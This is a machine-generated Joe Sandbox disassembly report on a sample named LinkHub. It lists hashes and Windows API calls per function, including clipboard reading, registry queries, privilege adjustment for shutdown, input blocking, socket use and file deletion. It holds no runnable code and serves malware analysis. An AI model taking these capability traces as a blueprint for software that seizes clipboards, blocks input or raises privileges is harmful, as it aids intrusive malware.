                                                                                        • Instruction Fuzzy Hash: 27D05EB2522324BF9B2C8B65DD4ACA7769CE901655380116FB806D2940F5B0FD10CAA0
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00240A84,?,?,00000000,?,00240A84,00000000,0000000C), ref: 00240737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 71acc7a6a55211f5ce23e18f08f68dce96af9aa7521bcc75271c34e4a1286167
                                                                                        • Instruction ID: 39c73b51b1c4b7cf88340db9b120e71bf46b17a334ca61f9b039b390dfe165ea
                                                                                        • Opcode Fuzzy Hash: 71acc7a6a55211f5ce23e18f08f68dce96af9aa7521bcc75271c34e4a1286167
                                                                                        • Instruction Fuzzy Hash: D1D06C3200010DBBDF028F84ED06EDA3BAAFB48714F014000BE1856020C732E821AB94
                                                                                        APIs
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
                                                                                          • Part of subcall function 00261A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
                                                                                          • Part of subcall function 00261A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
                                                                                          • Part of subcall function 00261A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00261518
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0026154C
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00261563
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0026159D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002615B9
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002615D0
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002615D8
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002615DF
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00261600
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00261607
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00261636
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00261658
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0026166A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00261691
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00261698
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002616A1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616A8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002616B1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616B8
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002616C4
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616CB
                                                                                          • Part of subcall function 00261ADF: GetProcessHeap.KERNEL32(00000008,002614FD,?,00000000,?,002614FD,?), ref: 00261AED
                                                                                          • Part of subcall function 00261ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002614FD,?), ref: 00261AF4
                                                                                          • Part of subcall function 00261ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002614FD,?), ref: 00261B03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                        • String ID:
                                                                                        • API String ID: 4175595110-0
                                                                                        • Opcode ID: 4adb098b8b066286bbd13f10dac1d202e295b12f61af35cbbc974df64f32e0ee
                                                                                        • Instruction ID: 178e58cc8c77dcb20e14cd922166775d0ae5328e304eca354c6cc4d7d5d20338
                                                                                        • Opcode Fuzzy Hash: 4adb098b8b066286bbd13f10dac1d202e295b12f61af35cbbc974df64f32e0ee
                                                                                        • Instruction Fuzzy Hash: 28715DB691020AABDF10DFA5EC49FEEBBBCBF04340F184516E915E7190D731A965CBA0
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(0029DCD0), ref: 0027F586
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0027F594
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0027F5A0
                                                                                        • CloseClipboard.USER32 ref: 0027F5AC
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F5E4
                                                                                        • CloseClipboard.USER32 ref: 0027F5EE
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F619
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0027F626
                                                                                        • GetClipboardData.USER32(00000001), ref: 0027F62E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F63F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F67F
                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0027F695
                                                                                        • GetClipboardData.USER32(0000000F), ref: 0027F6A1
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F6B2
                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0027F6D4
                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027F6F1
                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027F72F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F750
                                                                                        • CountClipboardFormats.USER32 ref: 0027F771
                                                                                        • CloseClipboard.USER32 ref: 0027F7B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                        • String ID:
                                                                                        • API String ID: 420908878-0
                                                                                        • Opcode ID: 962c976f911152095a5eb59c3a072c4d60431169a8e627de6351f3b623dc8880
                                                                                        • Instruction ID: 495e76374a9f0a5d87902e1e02a10641a138c63d6d45b6126319808fe995da67
                                                                                        • Opcode Fuzzy Hash: 962c976f911152095a5eb59c3a072c4d60431169a8e627de6351f3b623dc8880
                                                                                        • Instruction Fuzzy Hash: 2D61E5312183029FD300EF20ED88F2AB7A8AF44704F54846EF85A872A2DB71DD55DB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00277403
                                                                                        • FindClose.KERNEL32(00000000), ref: 00277457
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00277493
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002774BA
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002774F7
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00277524
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                        • API String ID: 3830820486-3289030164
                                                                                        • Opcode ID: acb4e140f9badccfdeecf9f4bf77885e4fe408997aec0895a295f2fb14c76ae2
                                                                                        • Instruction ID: 27ff82ffae336985fd1f8a4b6e28a3f196d9be07a5c01a540579a1da0a6367fb
                                                                                        • Opcode Fuzzy Hash: acb4e140f9badccfdeecf9f4bf77885e4fe408997aec0895a295f2fb14c76ae2
                                                                                        • Instruction Fuzzy Hash: 09D17E72518344AEC310EF64C885EABB7ECAF88704F44491DF589D7292EB74DA54CBA2
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0027A0A8
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0027A0E6
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0027A100
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0027A118
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A123
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0027A13F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0027A18F
                                                                                        • SetCurrentDirectoryW.KERNEL32(002C7B94), ref: 0027A1AD
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027A1B7
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A1C4
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A1D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1409584000-438819550
                                                                                        • Opcode ID: fa55020bf1e897535ed2882306b4841f03f7346febb4391fd3502bb099825759
                                                                                        • Instruction ID: 6ffaee153e3deea40c88b67594b2ab79e34a2856c56811f596a557483e720d88
                                                                                        • Opcode Fuzzy Hash: fa55020bf1e897535ed2882306b4841f03f7346febb4391fd3502bb099825759
                                                                                        • Instruction Fuzzy Hash: 8331D53261121A6BEB10AFB4EC4DADE73AC9F45330F508196F819D2090EB74DE649E65
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00274785
                                                                                        • _wcslen.LIBCMT ref: 002747B2
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002747E2
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00274803
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00274813
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0027489A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002748A5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002748B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 1149970189-3457252023
                                                                                        • Opcode ID: 011b482e7b5cc96f1990855fe915dad39b18e7515f7c5eec6001168f42c5d1e5
                                                                                        • Instruction ID: 9e274b863fd8f982fb9874c04d1fe0dd17035844d5e4f720574b6aecaf7bbd59
                                                                                        • Opcode Fuzzy Hash: 011b482e7b5cc96f1990855fe915dad39b18e7515f7c5eec6001168f42c5d1e5
                                                                                        • Instruction Fuzzy Hash: 3B31E67191014AABDB20AFA0EC49FEB37BCEF89700F1081B6F609D2060E77096548F25
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0027A203
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0027A25E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A269
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0027A285
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0027A2D5
                                                                                        • SetCurrentDirectoryW.KERNEL32(002C7B94), ref: 0027A2F3
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027A2FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A30A
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A31A
                                                                                          • Part of subcall function 0026E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0026E3B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 2640511053-438819550
                                                                                        • Opcode ID: fced30e5e8512858d7bf10abb527987a789c72db4d66eae42058795a7eb983f4
                                                                                        • Instruction ID: b677ddb39eda0ace2438c6e29ac563f1493206bed85b95d6ca4a96c672244ca7
                                                                                        • Opcode Fuzzy Hash: fced30e5e8512858d7bf10abb527987a789c72db4d66eae42058795a7eb983f4
                                                                                        • Instruction Fuzzy Hash: 7731143151061A6EDF10AFB4EC09EDE77AC9F85334F108196F818A3091DB71DEA5DE25
                                                                                        APIs
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C99E
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0028CA09
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028CA2D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0028CA8C
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0028CB47
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CBB4
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CC49
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0028CC9A
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CD43
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028CDE2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028CDEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3102970594-0
                                                                                        • Opcode ID: bf10e324d84a469c3da536522ac31b030ddb2732f802c809629272edbdde8000
                                                                                        • Instruction ID: 0638c96c9b22a4aa49cbf9bde294c9975334ef9f1760c00a551d47a435663e0d
                                                                                        • Opcode Fuzzy Hash: bf10e324d84a469c3da536522ac31b030ddb2732f802c809629272edbdde8000
                                                                                        • Instruction Fuzzy Hash: 8B027075615201AFD714EF28C895E2ABBE5EF49314F18849DF849CB2A2CB31EC52CF61
APIs
  • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
  • Part of subcall function 0026EAB0: GetFileAttributesW.KERNEL32(?,0026D840), ref: 0026EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 0026D9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0026DA88
• MoveFileW.KERNEL32(?,?), ref: 0026DA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0026DAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0026DAE2
  • Part of subcall function 0026DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0026DAC7,?,?), ref: 0026DB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 0026DAFE
• FindClose.KERNEL32(00000000), ref: 0026DB0F
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00262010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026205A
  • Part of subcall function 00262010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00262087
  • Part of subcall function 00262010: GetLastError.KERNEL32 ref: 00262097
• ExitWindowsEx.USER32(?,00000000), ref: 0026F249
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
APIs
• DefDlgProcW.USER32(?,?), ref: 0020233E
• GetSysColor.USER32(0000000F), ref: 00202421
• SetBkColor.GDI32(?,00000000), ref: 00202434
Strings
Similarity
• API ID: Color$Proc
• String ID: (-
• API String ID: 929743424-4239615555
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002456C2,?,?,00000000,00000000), ref: 00273A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002456C2,?,?,00000000,00000000), ref: 00273A35
• LoadResource.KERNEL32(?,00000000,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE), ref: 00273A45
• SizeofResource.KERNEL32(?,00000000,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE), ref: 00273A56
• LockResource.KERNEL32(002456C2,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE,?), ref: 00273A65
Strings
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
APIs
  • Part of subcall function 00261900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00261916
  • Part of subcall function 00261900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00261922
  • Part of subcall function 00261900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00261931
  • Part of subcall function 00261900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00261938
  • Part of subcall function 00261900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0026194E
• GetLengthSid.ADVAPI32(?,00000000,00261C81), ref: 002620FB
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00262107
• HeapAlloc.KERNEL32(00000000), ref: 0026210E
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00262127
• GetProcessHeap.KERNEL32(00000000,00000000,00261C81), ref: 0026213B
• HeapFree.KERNEL32(00000000), ref: 00262142
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0027A5BD
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0027A6D0
  • Part of subcall function 002742B9: GetInputState.USER32 ref: 00274310
  • Part of subcall function 002742B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002743AB
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0027A5ED
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0027A6BA
Strings
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
APIs
  • Part of subcall function 00283AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
  • Part of subcall function 00283AAB: _wcslen.LIBCMT ref: 00283AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002822BA
• WSAGetLastError.WSOCK32 ref: 002822E1
• bind.WSOCK32(00000000,?,00000010), ref: 00282338
• WSAGetLastError.WSOCK32 ref: 00282343
• closesocket.WSOCK32(00000000), ref: 00282372
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 0027D8CE
• GetLastError.KERNEL32(?,00000000), ref: 0027D92F
• SetEvent.KERNEL32(?,?,00000000), ref: 0027D943
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
APIs
• lstrlenW.KERNEL32(?,002446AC), ref: 0026E482
• GetFileAttributesW.KERNEL32(?), ref: 0026E491
• FindFirstFileW.KERNEL32(?,?), ref: 0026E4A2
• FindClose.KERNEL32(00000000), ref: 0026E4AE
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
APIs
Strings
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00232A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00232A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00232AA1
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
  • Part of subcall function 0022014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002209D8
  • Part of subcall function 0022014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002209F5
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026205A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00262087
• GetLastError.KERNEL32 ref: 00262097
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 0025E664
Strings
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274239
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00261B48), ref: 00261A20
• CloseHandle.KERNEL32(?,?,00261B48), ref: 00261A35
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• BlockInput.USER32(00000001), ref: 0027F51A
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0026EC95
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
